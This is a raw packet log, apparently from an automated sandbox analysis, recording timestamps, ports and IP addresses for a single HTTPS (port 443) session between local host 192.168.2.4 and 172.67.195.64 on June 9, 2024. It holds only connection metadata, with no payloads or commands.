Jun 9, 2024 01:26:07.596046925 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.596210957 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.596295118 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.596297026 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.596321106 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.596398115 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.596565008 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.596631050 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.596662998 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.637551069 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.637590885 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.684439898 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.711483002 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.711534977 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.711560965 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.711602926 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.711642981 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.711702108 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.712074995 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712249041 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712275982 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712337971 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.712353945 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712414980 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.712791920 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712893963 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712917089 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712935925 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.712969065 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.712984085 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.713011980 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.713814020 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.713844061 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.713870049 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.713879108 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.713891983 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.713927031 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.713937998 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.713985920 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.713998079 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.714674950 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.714742899 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.714756966 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.762542963 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.828958035 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829118013 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829205036 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.829224110 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829359055 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829432011 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.829441071 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829468012 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829608917 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829674006 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.829685926 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829741955 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.829752922 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829838991 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829935074 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.829946041 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.829974890 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830054998 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.830065966 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830121040 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.830406904 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830486059 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.830499887 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830558062 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.830594063 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830676079 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830681086 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.830699921 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.830755949 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.830755949 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.831233978 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.831311941 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.831801891 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.831873894 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.831893921 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.831954956 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.831979036 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.832045078 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.832701921 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.832787991 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.870897055 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.870970011 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945125103 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945236921 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945249081 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945308924 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945343018 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945347071 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945368052 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945382118 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945409060 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945450068 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945513964 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945528030 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945549965 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945616961 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.945630074 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.945983887 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946063995 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.946074963 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946096897 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946131945 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.946144104 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946167946 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.946186066 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946254015 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.946264982 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946327925 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.946846962 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946929932 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.946939945 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.946964025 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.947005987 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.947025061 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.947051048 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.947118044 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.947148085 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.947313070 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.947755098 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.947820902 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.947839022 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.947909117 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.947973967 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.948048115 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.948057890 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.948080063 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.948128939 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.948146105 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.948698997 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.948765039 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.948803902 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.948877096 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.948898077 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.948961020 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.949034929 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.949127913 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.949439049 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.949526072 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.949529886 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.949549913 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.949616909 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.949616909 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.986989021 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.987092972 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.987097025 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.987114906 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.987154961 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.987174988 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.060452938 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.060534000 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.060569048 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.060635090 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.061167002 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061237097 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.061317921 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061392069 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.061423063 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061445951 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061479092 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.061728001 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061764956 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061798096 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.061813116 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.061842918 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.061878920 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.062516928 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.062608957 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.062614918 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.062629938 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.062671900 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.062693119 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.065342903 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.065383911 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.065457106 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.065470934 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.065524101 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.065939903 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.065979958 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066020012 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066031933 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066061974 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066097021 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066637039 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066695929 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066721916 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066732883 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066768885 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066813946 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066818953 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066836119 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.066901922 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066901922 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.066921949 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.067002058 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.067922115 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068001986 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.068007946 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068028927 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068089962 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.068120003 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068157911 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068197966 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.068211079 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068247080 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.068368912 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.068906069 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068945885 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.068994999 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.068994999 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.069010019 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.069122076 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.069772005 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.069811106 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.069843054 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.069854975 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.069890976 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.069926023 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.069926977 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.069962978 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.069992065 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.070029974 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.070033073 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.070054054 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.070096970 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.070135117 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.103414059 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.103457928 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.103506088 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.103522062 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.103554964 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.103578091 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.177526951 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.177576065 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.177649021 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.177676916 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.177705050 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.177752018 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.177807093 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.177850008 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.177890062 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.177902937 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.177930117 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.177964926 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.178288937 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.178333044 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.178399086 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.178416014 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.178446054 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.178483963 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.178719997 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.178757906 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.178812027 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.178823948 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.178850889 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.178884029 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179099083 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179137945 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179173946 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179183960 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179220915 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179244995 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179421902 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179462910 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179508924 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179537058 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179564953 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179836035 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179884911 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179946899 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.179965019 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.179987907 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180035114 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180214882 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.180254936 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.180290937 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180300951 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.180326939 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180381060 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180761099 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.180800915 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.180841923 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180855036 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.180882931 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.180916071 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181042910 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181085110 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181128025 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181138992 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181163073 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181195021 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181502104 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181543112 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181585073 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181596041 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181622982 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181655884 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.181912899 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.181951046 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182037115 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182049036 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182071924 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182109118 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182234049 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182271957 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182316065 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182327032 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182365894 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182385921 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182579041 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182617903 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182653904 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182665110 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182689905 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182728052 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182904005 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182944059 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.182979107 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.182991028 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183017969 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183048010 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183079958 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183119059 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183152914 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183163881 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183202028 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183228970 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:08.183346987 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183387995 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:08.183423042 CEST	49733	443	192.168.2.4	172.67.195.64
